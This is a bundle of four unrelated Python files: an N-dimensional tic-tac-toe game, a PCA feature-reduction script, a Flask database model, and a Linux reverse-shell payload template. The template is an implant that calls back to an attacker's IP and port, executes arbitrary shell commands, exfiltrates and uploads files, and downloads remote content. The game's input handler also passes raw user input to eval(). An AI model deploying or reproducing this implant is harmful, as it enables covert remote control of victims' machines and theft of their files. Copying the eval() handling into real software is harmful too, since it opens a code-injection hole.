# --- TicTacToe2.py | tlively/N-TicTacToe | MIT ---

# N-Dimensional Tic-Tac-Toe by Thomas Lively
from __future__ import division
import curses, curses.ascii, sys


# logical representation of the n-dimensional board as a single list
class Model(object):
    def __init__(self, dimensions=2, size=0, players=2):
        if size < 3:
            size = dimensions+1
        self.dimensions = dimensions
        self.size = size
        if self.size < 3:
            self.size = 3
        self.players = players
        if self.players < 2 or self.players > 9:
            self.players = 2
        self.board = [0 for i in xrange(size**dimensions)]
        self.current_player = 1
        self.game_over = False
        self.tied_game = False
        self.moves = 0

    # makes the next player the active player
    def nextTurn(self):
        self.current_player += 1
        if self.current_player > self.players:
            self.current_player = 1
        return self.current_player

    def playAtCoordinate(self, coord):
        self.validateCoord(coord)
        self.playAtIndex(self.getIndexFromCoord(coord))

    # puts the current player's number into this index of the array, then checks for game over
    def playAtIndex(self, index):
        self.validateIndex(index)
        if self.board[index] != 0:
            raise IllegalMoveError(index)
        self.board[index] = self.current_player
        seqs = self.getSequencesFromIndex(index)
        for seq in seqs:
            n = 0
            for coord in seq:
                if self.board[self.getIndexFromCoord(coord)] == self.current_player:
                    n += 1
            if n == self.size:
                self.game_over = True
                break
        self.moves += 1
        if self.moves == self.size ** self.dimensions:
            self.tied_game = True
            self.game_over = True

    def getIndexFromCoord(self, coord):
        self.validateCoord(coord)
        index = 0
        for i in xrange(len(coord)-1, -1, -1):
            index += coord[i]*(self.size**i)
        return index

    def getCoordFromIndex(self, index):
        self.validateIndex(index)
        coord_list = []
        for i in xrange(self.dimensions):
            nd = self.size**(self.dimensions-1-i)
            coord_list.append(index//nd)
            index %= nd
        coord_list.reverse()
        return tuple(coord_list)

    def getSequencesFromIndex(self, index):
        return self.getSequencesFromCoord(self.getCoordFromIndex(index))

    # returns all the possible winning sequences containing this coordinate set
    def getSequencesFromCoord(self, coord):
        # from a set of indices, return a subset with elements indicated by the ones in
        # bin_rep
        def getIndexSet(indices, bin_rep):
            iset = []
            for i in xrange(len(indices)):
                if bin_rep[i] == u"1":
                    iset.append(indices[i])
            return iset

        # given a set of indices that should be varied, return the n versions of coord
        def getVariedSequences(varying_indices):
            returned_sequences = []
            for i in xrange(self.size):
                new_coord = list(coord)
                for index in varying_indices:
                    if coord[index] < self.size//2:
                        new_coord[index] = i
                    else:
                        new_coord[index] = self.size-i-1
                returned_sequences.append(new_coord)
            return returned_sequences

        # given a set of indices that should be varied and a binary representation of
        # the direction in which they should vary, return the n versions of coord
        def getMidVariedSequences(varying_indices, vary_dir):
            returned_sequences = []
            for i in xrange(self.size):
                new_coord = list(coord)
                for j in xrange(len(varying_indices)):
                    if vary_dir[j] == u"1":
                        new_coord[varying_indices[j]] = i
                    else:
                        new_coord[varying_indices[j]] = self.size-i-1
                returned_sequences.append(new_coord)
            return returned_sequences

        self.validateCoord(coord)
        returned_sequences = []
        # for values up to half if evenly sized, up to middle-1 if oddly sized
        for x in xrange(self.size//2+1):
            x2 = self.size-x-1
            all_indices = []
            for index in xrange(len(coord)):
                if coord[index] == x or coord[index] == x2:
                    all_indices.append(index)
            # every non-empty subset of the candidate axes yields one family of lines
            for i in xrange(1, 2 ** len(all_indices)):
                bin_rep = bin(i)[2:]
                while len(bin_rep) < len(all_indices):
                    bin_rep = u"0" + bin_rep
                iset = getIndexSet(all_indices, bin_rep)
                if x != x2:
                    returned_sequences.append(getVariedSequences(iset))
                else:
                    for j in xrange(2 ** (len(iset)-1)):
                        dir_vary = bin(j)[2:]
                        while len(dir_vary) < len(iset):
                            dir_vary = u"0" + dir_vary
                        mid_sequences = getMidVariedSequences(iset, dir_vary)
                        returned_sequences.append(mid_sequences)
        return returned_sequences

    def validateIndex(self, index):
        if index < 0 or index >= len(self.board):
            raise ValueError(u"Invalid index")

    def validateCoord(self, coord):
        if len(coord) != self.dimensions:
            raise ValueError(u"Coordinate needs " + unicode(self.dimensions) + u" dimensions")
        for i in coord:
            if i >= self.size or i < 0:
                raise ValueError(u"0 <= coordinate < " + unicode(self.size))

    # xy pairs from high order to low order to model coordinates
    def XYCoordToCoord(self, xy):
        coord = []
        start = 0
        if self.dimensions % 2 == 1:
            start = 1
        for i in xrange(start+1, len(xy), 2):
            coord.insert(0, xy[i])
        if start == 1:
            coord.insert(0, xy[0])
        for i in xrange(start, len(xy), 2):
            coord.insert(0, xy[i])
        return tuple(coord)


class IllegalMoveError(Exception):
    def __init__(self, index):
        self.index = index

    def __str__(self):
        return u"Illegal move at index " + unicode(self.index)


# A view for the model. Other views might use Curses or a graphics library
class PlainTextView():
    def __init__(self, model):
        self.model = model
        self.create()

    # returns the divider that goes between board units of the d-th horizontal order
    def getHorizontalDivider(self, d):
        if d < 0: return
        if d == 0: return [u"|"]
        if d == 1: return [u" "]
        div = [u" ", u" "]
        for i in xrange(d-1):
            div.insert(1, u"|")
        return div

    # returns the divider that goes between board units of the d-th vertical order
    def getVerticalDivider(self, d):
        if d < 0: return
        if d == 0: return [u"-"]
        if d == 1: return [u" "]
        div = [u" ", u" "]
        for i in xrange(d-1):
            div.insert(1, u"-")
        return div

    # recursively create the board as a matrix of characters
    def createMatrix(self, d):
        if d < 0: return
        if d == 0: return [[u"X"]]
        sub_block = self.createMatrix(d-1)
        returned = []
        if d % 2 == 1:
            divider = self.getHorizontalDivider(d // 2)
            for row in sub_block:
                new_row = []
                for char in row:
                    new_row.append(char)
                for i in xrange(self.model.size - 1):
                    for char in divider:
                        new_row.append(char)
                    for char in row:
                        new_row.append(char)
                returned.append(new_row)
            return returned
        if d % 2 == 0:
            divider = self.getVerticalDivider(d // 2 - 1)
            for row in sub_block:
                new_row = []
                for char in row:
                    new_row.append(char)
                returned.append(new_row)
            for i in xrange(self.model.size - 1):
                for char in divider:
                    new_row = []
                    for j in xrange(len(sub_block[0])):
                        new_row.append(char)
                    returned.append(new_row)
                for row in sub_block:
                    new_row = []
                    for char in row:
                        new_row.append(char)
                    returned.append(new_row)
            return returned

    # use the matrix of characters that make up the board to create maps from the
    # representation's indices to the model's and vice versa, and create an str
    def create(self):
        matrix = self.createMatrix(self.model.dimensions)
        self.str_rep = u""
        for row in matrix:
            for char in row:
                self.str_rep += char
            self.str_rep += u"\n"
        #print(str_rep)
        self.model_to_view = dict()
        self.view_to_model = dict()
        model_index = 0
        for i in xrange(len(self.str_rep)):
            if self.str_rep[i] == u"X":
                self.str_rep = self.str_rep.replace(u"X", u" ", 1)
                self.model_to_view[model_index] = i
                self.view_to_model[i] = model_index
                model_index += 1

    # given char from model, return char for display
    def getDisplayChar(self, c):
        if c == 0: return u" "
        if self.model.players == 2:
            if c == 1: return u"X"
            if c == 2: return u"O"
        return unicode(c)

    # must be called to update the view when the state of index i in the model changes
    def update(self, i):
        index = self.model_to_view[i]
        char = self.getDisplayChar(self.model.board[i])
        self.str_rep = self.str_rep[:index] + char + self.str_rep[index+1:]

    def __str__(self):
        return self.str_rep


# serves as a "Main" class and controls user interface with model and view
class TextGameController():
    def __init__(self):
        dimensions = int(raw_input(u"dimensions: "))
        size = int(raw_input(u"size: "))
        players = int(raw_input(u"players: "))
        print u"creating model..."
        self.board = Model(dimensions, size, players)
        print u"creating view..."
        self.view = PlainTextView(self.board)
        while True:
            print
            print self.view
            print
            player = u"Player " + unicode(self.board.current_player)
            coord = self.makeMove(player + u": ")
            self.view.update(self.board.getIndexFromCoord(coord))
            if self.board.game_over:
                if self.board.tied_game:
                    print u"It's a tie :("
                    break
                print self.view
                print
                print player + u" wins!"
                break
            self.board.nextTurn()

    # transform user input to model coordinates and run it through the
    # necessary checks, repeating if necessary
    def makeMove(self, prompt):
        coord = None
        while True:
            try:
                raw_in = eval(u"(" + raw_input(prompt) + u")")
                coord = self.board.XYCoordToCoord(raw_in)
                print coord
            except Exception, e:
                print u"Unrecognizable input"
                continue
            try:
                self.board.validateCoord(coord)
            except Exception, e:
                print e
                continue
            try:
                self.board.playAtCoordinate(coord)
                break
            except Exception, e:
                print u"Illegal move!"
                continue
        return coord


class CursesController(object):
    def main(self, stdscr):
        model = self.model
        view = self.view

        def alert():
            curses.beep()
            curses.flash()

        uneven = model.dimensions % 2 != 0
        locked_coords = []
        selected_x = model.size // 2
        selected_y = 0
        if not (len(locked_coords) == 0 and uneven):
            selected_y = model.size // 2

        def getEnclosingRectangle(coord):
            extension = xrange(model.dimensions - len(coord))
            min_xycoord = coord[:]
            min_xycoord.extend([0 for i in extension])
            min_coord = model.XYCoordToCoord(min_xycoord)
            max_xycoord = coord[:]
            max_xycoord.extend([model.size-1 for i in extension])
            max_coord = model.XYCoordToCoord(max_xycoord)
            min_index = view.model_to_view[model.getIndexFromCoord(min_coord)]
            min_index = min_index - unicode(view).count(u"\n", 0, min_index)
            max_index = view.model_to_view[model.getIndexFromCoord(max_coord)]
            max_index = max_index - unicode(view).count(u"\n", 0, max_index)
            length = unicode(view).find(u"\n")
            min_x = min_index % length
            min_y = min_index // length
            max_x = max_index % length
            max_y = max_index // length
            return (min_y, min_x, max_y, max_x)

        def getPlayerColor(p):
            colors = {1: 4, 2: 1, 3: 2, 4: 3, 5: 5, 6: 6, 7: 7, 8: 5, 9: 7}
            return int(colors[((p-1) % 9)+1])

        curses.curs_set(0)
        win = curses.newpad(unicode(view).count(u"\n")+1, unicode(view).find(u"\n")+1)
        for i in xrange(1, 8):
            curses.init_pair(i, i, 0)
        history = []
        initialized = False
        while not model.game_over:
            stdscr.clear()
            # Title Box Outline
            stdscr.addch(0, 0, curses.ACS_ULCORNER)
            stdscr.hline(0, 1, curses.ACS_HLINE, curses.COLS-2)
            stdscr.addch(0, curses.COLS-1, curses.ACS_URCORNER)
            stdscr.vline(1, 0, curses.ACS_VLINE, 3)
            stdscr.vline(1, curses.COLS-1, curses.ACS_VLINE, 3)
            panel_width = model.dimensions * 2 + 11
            # Board Area Outline
            stdscr.addch(4, 0, curses.ACS_ULCORNER)
            stdscr.hline(4, 1, curses.ACS_HLINE, curses.COLS-panel_width-1)
            stdscr.addch(curses.LINES-1, 0, curses.ACS_LLCORNER)
            stdscr.hline(curses.LINES-1, 1, curses.ACS_HLINE, curses.COLS-panel_width-1)
            stdscr.vline(5, 0, curses.ACS_VLINE, curses.LINES-6)
            # Top Panel Box Outline
            stdscr.addch(4, curses.COLS-panel_width, curses.ACS_ULCORNER)
            stdscr.hline(4, curses.COLS-panel_width+1, curses.ACS_HLINE, panel_width-2)
            stdscr.addch(4, curses.COLS-1, curses.ACS_URCORNER)
            stdscr.vline(5, curses.COLS-panel_width, curses.ACS_VLINE, 4)
            stdscr.vline(5, curses.COLS-1, curses.ACS_VLINE, 4)
            stdscr.addch(9, curses.COLS-panel_width, curses.ACS_LLCORNER)
            stdscr.addch(9, curses.COLS-1, curses.ACS_LRCORNER)
            stdscr.hline(9, curses.COLS-panel_width+1, curses.ACS_HLINE, panel_width-2)
            # Bottom Panel Outline
            stdscr.vline(10, curses.COLS-panel_width, curses.ACS_VLINE, curses.LINES-11)
            stdscr.vline(10, curses.COLS-1, curses.ACS_VLINE, curses.LINES-11)
            stdscr.addch(curses.LINES-1, curses.COLS-panel_width, curses.ACS_LLCORNER)
            stdscr.hline(curses.LINES-1, curses.COLS-panel_width+1,
                         curses.ACS_HLINE, panel_width-2)
            try:
                stdscr.addch(curses.LINES-1, curses.COLS-1, curses.ACS_LRCORNER)
            except curses.error:
                # writing the bottom-right cell raises once the cursor wraps,
                # but the character is still drawn
                pass
            title = u"N-Dimensional Tic-Tac-Toe ({0}^{1})"\
                .format(model.size, model.dimensions)
            stdscr.addstr(2, curses.COLS//2 - len(title)//2, title)
            # Get input
            key = None
            curses.flushinp()
            if initialized:
                key = win.getch()
            else:
                initialized = True
            if key == ord(u"w"):
                if selected_y == 0 or len(locked_coords) == 0 and uneven:
                    alert()
                else:
                    selected_y -= 1
            if key == ord(u"s"):
                if selected_y == model.size-1 or len(locked_coords) == 0 and uneven:
                    alert()
                else:
                    selected_y += 1
            if key == ord(u"a"):
                if selected_x == 0:
                    alert()
                else:
                    selected_x -= 1
            if key == ord(u"d"):
                if selected_x == model.size-1:
                    alert()
                else:
                    selected_x += 1
            if key == ord(u"\n"):
                locked_coords.append(selected_x)
                if not (len(locked_coords) == 1 and uneven):
                    locked_coords.append(selected_y)
                selected_x = model.size // 2
                selected_y = 0
                if not (len(locked_coords) == 0 and uneven):
                    selected_y = model.size // 2
                if len(locked_coords) == model.dimensions:
                    try:
                        coord = model.XYCoordToCoord(locked_coords)
                        model.playAtCoordinate(coord)
                        view.update(model.getIndexFromCoord(coord))
                        history.insert(0, (model.current_player, locked_coords[:]))
                        del locked_coords[:]
                        selected_x = model.size // 2
                        selected_y = 0
                        if not (len(locked_coords) == 0 and uneven):
                            selected_y = model.size // 2
                        if not model.game_over:
                            model.nextTurn()
                    except Exception:
                        key = curses.ascii.ESC
            if key == curses.ascii.ESC:
                if len(locked_coords) == 0:
                    alert()
                else:
                    selected_y = locked_coords[-1]
                    del locked_coords[-1]
                    if not (len(locked_coords) == 0):
                        selected_x = locked_coords[-1]
                        del locked_coords[-1]
                    else:
                        selected_x = selected_y
                        selected_y = 0
            # Draw info box contents
            info_line = u"Player {0}".format(model.current_player)
            stdscr.addstr(6, int(curses.COLS-(panel_width + len(info_line))/2),
                          info_line,
                          curses.color_pair(
                              getPlayerColor(
                                  model.current_player)))
            info_coord = locked_coords[:]
            info_coord.append(selected_x)
            if not (len(locked_coords) == 0 and uneven):
                info_coord.append(selected_y)
            info_line = unicode(info_coord)[1:-1].replace(u" ", u"")
            stdscr.addstr(7, int(curses.COLS-(panel_width + len(info_line))/2),
                          info_line,
                          curses.color_pair(
                              getPlayerColor(
                                  model.current_player)))
            # Draw move history
            for i, move in enumerate(history):
                if 10 + i == curses.LINES - 1:
                    break
                p, loc = move
                loc = unicode(loc)[1:-1].replace(u" ", u"")
                stdscr.addstr(10+i, curses.COLS-panel_width+1,
                              u"Player {0}: {1}".format(p, loc),
                              curses.color_pair(getPlayerColor(p)))
            # Draw board
            win.addstr(0, 0, unicode(view))
            # Highlight selected area
            coord = locked_coords[:]
            coord.append(selected_x)
            if not (len(locked_coords) == 0 and uneven):
                coord.append(selected_y)
            min_y, min_x, max_y, max_x = getEnclosingRectangle(coord)
            for y in xrange(min_y, max_y+1):
                win.chgat(y, min_x, max_x + 1 - min_x,
                          curses.A_REVERSE |
                          curses.color_pair(getPlayerColor(model.current_player)))
            # Highlight past moves
            for p, loc in history:
                rect = getEnclosingRectangle(loc)
                current = win.inch(rect[0], rect[1])
                if current == current | curses.A_REVERSE:
                    win.chgat(rect[0], rect[1], 1, curses.color_pair(getPlayerColor(p)))
                else:
                    win.chgat(rect[0], rect[1], 1,
                              curses.color_pair(getPlayerColor(p)) | curses.A_REVERSE)
            # Calculate area of board to display
            pminrow = 0
            pmincol = 0
            pheight = unicode(view).count(u"\n")-1
            pwidth = unicode(view).find(u"\n")-1
            sminrow = 5
            smincol = 1
            smaxrow = curses.LINES-2
            smaxcol = curses.COLS-panel_width-1
            sheight = smaxrow - sminrow
            swidth = smaxcol - smincol
            if pheight <= sheight:
                dif = sheight - pheight
                sminrow += dif // 2
            else:
                pminrow1 = min_y - sheight * min_y / pheight
                pminrow2 = sheight/pheight*(pheight-max_y) + max_y - sheight
                dif1 = min_y
                dif2 = pheight - max_y
                if not (dif1 == 0 and dif2 == 0):
                    pminrow = int((pminrow1 * dif2 + pminrow2 * dif1) / (dif1 + dif2)+.5)
                else:
                    dif = sheight - pheight
                    sminrow += dif // 2
            if pwidth <= swidth:
                dif = swidth - pwidth
                smincol += dif // 2
            else:
                pmincol1 = min_x - swidth * min_x / pwidth
                pmincol2 = swidth/pwidth*(pwidth-max_x) + max_x - swidth
                dif1 = min_x
                dif2 = pwidth - max_x
                if not (dif1 == 0 and dif2 == 0):
                    pmincol = int((pmincol1 * dif2 + pmincol2 * dif1) / (dif1 + dif2)+.5)
                else:
                    dif = swidth - pwidth
                    smincol += dif // 2
            # Refresh the display
            stdscr.refresh()
            win.refresh(pminrow, pmincol, sminrow, smincol, smaxrow, smaxcol)
        stdscr.clear()
        win.clear()
        if not model.tied_game:
            player = model.current_player
            message = u"PLAYER {0} WINS!".format(player)
            stdscr.addstr(curses.LINES//2, int((curses.COLS - len(message))/2+.5), message,
                          curses.A_BLINK | curses.A_REVERSE | curses.color_pair(getPlayerColor(player)))
        else:
            message = u"IT'S A TIE :("
            stdscr.addstr(curses.LINES//2, int((curses.COLS - len(message))/2+.5), message,
                          curses.A_BLINK | curses.A_REVERSE)
        stdscr.getch()

    def __init__(self, model):
        self.model = model
        self.view = PlainTextView(self.model)
        curses.wrapper(self.main)


# run the game if run as a script
if __name__ == u"__main__":
    #TextGameController()
    args = [int(i) for i in sys.argv[1:]]
    if args:
        CursesController(Model(*args))
    else:
        CursesController(Model(4))
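
# Usage sketch (not from the repo; Python 2, since the module relies on
# xrange/raw_input/unicode). Model can be driven without either controller:
#
#   from TicTacToe2 import Model
#   m = Model(dimensions=2, size=3, players=2)   # a classic 3x3 board
#   m.playAtCoordinate((0, 0))                   # player 1 takes a corner
#   m.nextTurn()                                 # turns advance explicitly
#   m.playAtCoordinate((1, 1))                   # player 2 takes the center
#   print m.game_over, m.moves                   # -> False 2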
# --- src/classical_ml/pca.py | Jagriti-dixit/CS229_Project_Final | MIT ---

import sys
import time
from comet_ml import Experiment
import pydub
import numpy as np
from pydub import AudioSegment
import librosa
import librosa.display
import matplotlib.pyplot as plt
import sklearn
from sklearn import preprocessing, metrics, svm
from sklearn.preprocessing import MinMaxScaler, StandardScaler, LabelEncoder
import pandas as pd
from pathlib import Path
import math, random
import zipfile as zf
import soundfile as sf
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import RFE
import json
from sklearn.naive_bayes import GaussianNB
from sklearn.metrics import (accuracy_score, classification_report, precision_score,
                             recall_score, f1_score, confusion_matrix,
                             ConfusionMatrixDisplay, precision_recall_curve,
                             roc_curve, auc, log_loss, plot_confusion_matrix)
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
import getSamples as gs
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import seaborn as sns
train_file = sys.argv[1]
test_file = sys.argv[2]
print("Reading train and test dataset")
#train = pd.read_csv('train_data_noise_pad.csv')
train = pd.read_csv(train_file)
print("read train data")
#test = pd.read_csv('test_data_noise_pad.csv')
test = pd.read_csv(test_file)
print("read test data")
print("Read two big files ")
X_train = train.iloc[:,:2040]
y_train = train.iloc[:,2041]
X_test = test.iloc[:,:2040]
y_test = test.iloc[:,2041]
# X_train = train.iloc[:,:20]
# y_train = train.iloc[:,21]
# X_test = test.iloc[:,:20]
# y_test = test.iloc[:,21]
X_train = StandardScaler(with_mean=True).fit_transform(X_train)
X_test = StandardScaler(with_mean=True).fit_transform(X_test)
print("Mean of train data is ",np.mean(X_train),"Std deviation is",np.std(X_train))
pca = PCA().fit(X_train)
print('Explained variation per principal component:{}'.format((pca.explained_variance_ratio_)))
plt.plot(np.cumsum(pca.explained_variance_ratio_))
plt.xlabel('number of components')
plt.ylabel('Cumulative explained variance')
plt.savefig("cumulative_variance_plot.png")
time_start = time.time()
print("we want to see the accumulated variance of 700 features ")
pca = PCA(n_components = 700)
pca_result = pca.fit_transform(X_train)
pca_test = pca.transform(X_test)
X_train_pca = pca_result
X_test_pca = pca_test
out_train = "train_pca.csv"
pca_train = pd.DataFrame(data=X_train_pca)
pca_train['language'] = y_train
out_file_train = open(out_train,'wb')
pca_train.to_csv(out_file_train,index=False)
out_file_train.close()
out_test = "test_pca.csv"
pca_test = pd.DataFrame(data=X_test_pca)
pca_test['language'] = y_test
out_file_test = open(out_test,'wb')
pca_test.to_csv(out_file_test,index=False)
out_file_test.close()
print("shapes are",X_train_pca.shape,y_train.shape)
print("X_train shape is ",X_train_pca.shape,"X_test shape is",X_test_pca.shape)
print("Total variation in these 1000 features is",np.sum(pca.explained_variance_ratio_))
print('PCA done! Time elapsed: {} seconds'.format(time.time()-time_start))
print("Now lets plot PCA for 2D visualisation")
##Taking only some of the total dataset randomly for plotting
np.random.seed(42)
rndperm = np.random.permutation(train.shape[0])
#2D plot(Having two components)
plt.figure(figsize=(16,10))
pca = PCA(n_components = 2)
pca_result = pca.fit_transform(X_train)
train['pca_one'] = pca_result[:,0]
train['pca_two'] = pca_result[:,1]
sns.scatterplot(
    x="pca_one", y="pca_two",
    hue="2041",
    palette=sns.color_palette("hls", 3),
    data=train.loc[rndperm, :],
    legend="full",
    alpha=0.3
)
plt.savefig("PCA_2d.png")
###PCA with 3 components
pca = PCA(n_components = 3)
pca_result = pca.fit_transform(X_train)
train['pca_one'] = pca_result[:,0]
train['pca_two'] = pca_result[:,1]
train['pca_three'] = pca_result[:,2]
print("Its processing 3d plot")
#3D plot(Having 3 components)
ax = plt.figure(figsize=(16,10)).gca(projection='3d')
ax.scatter(
    xs=train.loc[rndperm, :]["pca_one"],
    ys=train.loc[rndperm, :]["pca_two"],
    zs=train.loc[rndperm, :]["pca_three"],
    c=train.loc[rndperm, :]["2041"],
    cmap='tab10'
)
ax.set_xlabel('pca_one')
ax.set_ylabel('pca_two')
ax.set_zlabel('pca_three')
plt.savefig("PCA_3d.png")
# --- main/models/sign.py | fakegit/gxgk-wechat-server | MIT ---

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from . import db
class Sign(db.Model):
    __table_args__ = {
        'mysql_engine': 'InnoDB',
        'mysql_charset': 'utf8mb4'
    }
    openid = db.Column(db.String(32), primary_key=True, unique=True,
                       nullable=False)
    lastsigntime = db.Column(db.BigInteger, default=0, nullable=False)
    totaldays = db.Column(db.SmallInteger, default=0, nullable=False)
    keepdays = db.Column(db.SmallInteger, default=0, nullable=False)

    def __init__(self, openid, lastsigntime, totaldays, keepdays):
        self.openid = openid
        self.lastsigntime = lastsigntime
        self.totaldays = totaldays
        self.keepdays = keepdays

    def __repr__(self):
        return '<openid %r>' % self.openid

    def save(self):
        db.session.add(self)
        db.session.commit()
        return self

    def update(self):
        db.session.commit()
        return self
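
# Hypothetical helper (not part of the model) sketching how the fields
# combine: the keepdays streak continues only if the previous check-in was
# recent; the two-day cutoff here is an assumption, not project logic.
import time

def next_keepdays(sign, now=None):
    now = now or int(time.time())
    if now - sign.lastsigntime < 2 * 24 * 3600:
        return sign.keepdays + 1  # consecutive day: extend the streak
    return 1                      # gap: streak restarts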
# --- payload_templates/lin_shell_payload.py | ahirejayeshbapu/python-shell | MIT ---

import subprocess, os, socket, re, pickle, docx, urllib2
from platform import platform
from getpass import getuser
from time import sleep
from datetime import datetime
port = !!!!!
ip_addr = @@@@@
lkey = #####
End = $$$$$
skey = %%%%%
time_to_sleep = ^^^^^
type_of_scout = 'Command Shell'
try:
    operating_sys = platform()
except:
    operating_sys = '?????'
try:
    hostname = socket.gethostname()
except:
    hostname = '?????'
try:
    username = getuser()
except:
    username = '?????'

userinfo = hostname + '/' + username
scout_data = [skey, lkey, userinfo, type_of_scout, operating_sys]
shell_type = '/bin/bash'
s = None
help_menu = '''\nCommand Shell Menu
==================

Global Commands :
    banner                      Display a banner
    clear                       Clear the screen
    help                        Show the help menu
    local <shell command>       Locally execute a shell command
    python                      Enter the system python interpreter
    quit                        Quit the framework

Connection commands :
    disconnect                  Make the scout disconnect and try to reconnect
    terminate                   Kill the scout process
    sleep <seconds>             Disconnect the scout and make it sleep for some time

Handler commands :
    back                        Move back to scout handler

Command Shell Commands :
    exec <shell command>        Executes shell command and returns output
    exec_file <shell command>   Executes a shell command with no output(use this to run files and avoid blocking)
    swap <shell path>           Switch the type of shell used, default is "/bin/bash"

File Commands :
    download <filepath>         Download file
    dump <filepath>             Dump and view file content(supports .docx file)
    upload <filepath>           Upload a file
    web_download <url>          Download a file through a url\n'''


def basename(filepath):
    basename = re.search(r'[^\\/]+(?=[\\/]?$)', filepath)
    if basename:
        return basename.group(0)


def recvall(tar_socket):
    tar_socket.settimeout(None)
    data = tar_socket.recv(9999)
    if not data:
        return ''
    while True:
        if data.endswith(End):
            try:
                tar_socket.settimeout(1)
                more_data = tar_socket.recv(9999)
                if not more_data:
                    return data[:-len(End)]
                data += more_data
            except (socket.timeout, socket.error):
                tar_socket.settimeout(None)
                return data[:-len(End)]
        else:
            more_data = tar_socket.recv(9999)
            data += more_data


def shell_execute(execute):
    if execute[:3] == 'cd ':
        try:
            execute = execute.replace('cd ', '')
            os.chdir(execute)
            s.sendall("[+]Changed to directory : " + execute + End)
        except:
            s.sendall('[-]Could not change to directory : ' + execute + End)
    else:
        try:
            result = subprocess.Popen(execute, shell=True, executable=shell_type,
                                      stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                      stdin=subprocess.PIPE)
            result = result.stdout.read() + result.stderr.read()
            try:
                s.sendall(unicode(result + End))
            except:
                s.sendall(result + End)
        except:
            s.sendall('[-]Could not execute command' + End)


def file_execute(command):
    try:
        result = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,
                                  stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        s.sendall('[+]Executed : ' + command + End)
    except Exception as e:
        s.sendall('[-]Error executing, "' + command + '" : ' + str(e) + End)


def upload_file(file_name, content):
    try:
        f = open(basename(file_name), 'wb')
        f.write(content)
        f.close()
        s.sendall('[+]Uploaded file successfully' + End)
    except Exception as e:
        s.sendall('[-]Error writing to file "' + file_name + '" : ' + str(e) + End)


def download_file(file_name):
    if os.path.isfile(file_name):
        try:
            f = open(file_name, 'rb')
            bin_data = f.read()
            f.close()
            s.sendall(file_name + '|/' + bin_data + End)
        except Exception as e:
            s.sendall('[-]Error reading from file "' + file_name + '" : ' + str(e) + End)
    else:
        s.sendall('[-]File path/name is not valid' + End)


def dump_file(file_name):
    try:
        if os.path.isfile(file_name):
            extension = basename(file_name).split('.')[-1]
            if extension == 'docx':
                try:
                    doc = docx.Document(file_name)
                    data = '\n\n'.join([paragraph.text.encode('utf-8') for paragraph in doc.paragraphs])
                    s.sendall(data + End)
                except Exception as e:
                    s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
            else:
                try:
                    f = open(file_name, 'rb')
                    data = f.read()
                    f.close()
                    try:
                        s.sendall(unicode(data + End))
                    except:
                        try:
                            s.sendall(data + End)
                        except Exception as e:
                            s.sendall('[-]Error dumping file "' + basename(file_name) + '" : ' + str(e) + End)
                except Exception as e:
                    s.sendall('[-]Error reading "' + file_name + '" : ' + str(e) + End)
        else:
            s.sendall('[-]File path/name is not valid' + End)
    except Exception as e:
        s.sendall('[-]Error dumping file : ' + str(e) + End)


def download_from_web(url):
    try:
        url_data = url.split('/')[-1]
        file_name = urllib2.unquote(url_data)
        if file_name == '':
            file_name = datetime.now().strftime("%Y%m%d-%H%M%S")
        response = urllib2.urlopen(url)
        data = response.read()
        f = open(file_name, 'wb')
        f.write(data)
        f.close()
        s.sendall('[+]Downloaded : ' + url + ' -> ' + file_name + End)
    except Exception as e:
        s.sendall('[-]Error downloading file : ' + str(e) + End)


def main():
    global s, shell_type
    while True:
        # keep retrying until the listener is reachable
        while True:
            try:
                s = socket.socket()
                s.connect((ip_addr, port))
                break
            except:
                sleep(time_to_sleep)
                continue
        s.sendall(pickle.dumps(scout_data) + End)
        while True:
            try:
                #s.settimeout(None)
                data = recvall(s).split(' ', 1)
                command = data[0]
                if command == 'help':
                    s.sendall(help_menu + End)
                elif command == 'disconnect':
                    s.sendall('[*]Disconnecting...' + End)
                    sleep(5)
                    break
                elif command == 'terminate':
                    s.sendall('[*]Terminating scout...' + End)
                    os._exit(1)
                elif command == 'sleep':
                    try:
                        sleep_time = int(data[1])
                    except:
                        s.sendall('[-]Please specify an integer as the sleep duration' + End)
                        continue
                    s.sendall('[*]Scout going offline for : ' + str(sleep_time) + ' seconds' + End)
                    s.shutdown(1)
                    s.close()
                    for i in range(sleep_time):
                        sleep(1)
                    break
                elif command == 'exec':
                    try:
                        execute = data[1]
                    except:
                        s.sendall('[-]Specify a command to execute' + End)
                        continue
                    shell_execute(execute)
                elif command == 'exec_file':
                    try:
                        execute = data[1]
                    except:
                        s.sendall('[-]Specify command/file to execute' + End)
                        continue
                    file_execute(execute)
                elif command == 'swap':
                    try:
                        shell_type = data[1]
                        s.sendall('[+]Current shell in use is : ' + shell_type + End)
                    except:
                        s.sendall('[-]Specify a shell type' + End)
                elif command == 'download':
                    try:
                        file_name = data[1]
                    except:
                        s.sendall('[-]Specify file to download' + End)
                        continue
                    download_file(file_name)
                elif command == 'upload':
                    data = data[1].split('|/', 1)
                    file_name = data[0]
                    file_contents = data[1]
                    upload_file(file_name, file_contents)
                elif command == 'dump':
                    try:
                        file_target = data[1]
                    except:
                        s.sendall('[-]Specify file to dump contents of' + End)
                        continue
                    dump_file(file_target)
                elif command == 'web_download':
                    try:
                        download_from_web(data[1])
                    except IndexError:
                        s.sendall('[-]Specify URL to download from' + End)
                        continue
                    except Exception as e:
                        s.sendall('[-]Error downloading from url : ' + str(e) + End)
                        continue
                elif command == 'ping':
                    s.sendall('[+]Scout is alive' + End)
                else:
                    s.sendall('[-]Unknown command "' + command + '", run "help" for help menu' + End)
            except (socket.error, socket.timeout):
                try:
                    s.shutdown(1)
                    s.close()
                    break
                except socket.error:
                    break
            except Exception as e:
                try:
                    if command:
                        s.sendall('[-]Error, last run command : ' + command + '. Error message : ' + str(e) + End)
                    else:
                        s.sendall('[-]Error message : ' + str(e) + End)
                except:
                    s.shutdown(1)
                    s.close()
                    break


main()
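
# Sketch of the delimiter framing recvall() relies on (illustrative; 'END'
# stands in for the templated $$$$$ end-marker): each message is sent with
# the marker appended and stripped again on receipt.
def frame(message, end='END'):
    return message + end

def unframe(data, end='END'):
    return data[:-len(end)] if data.endswith(end) else data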
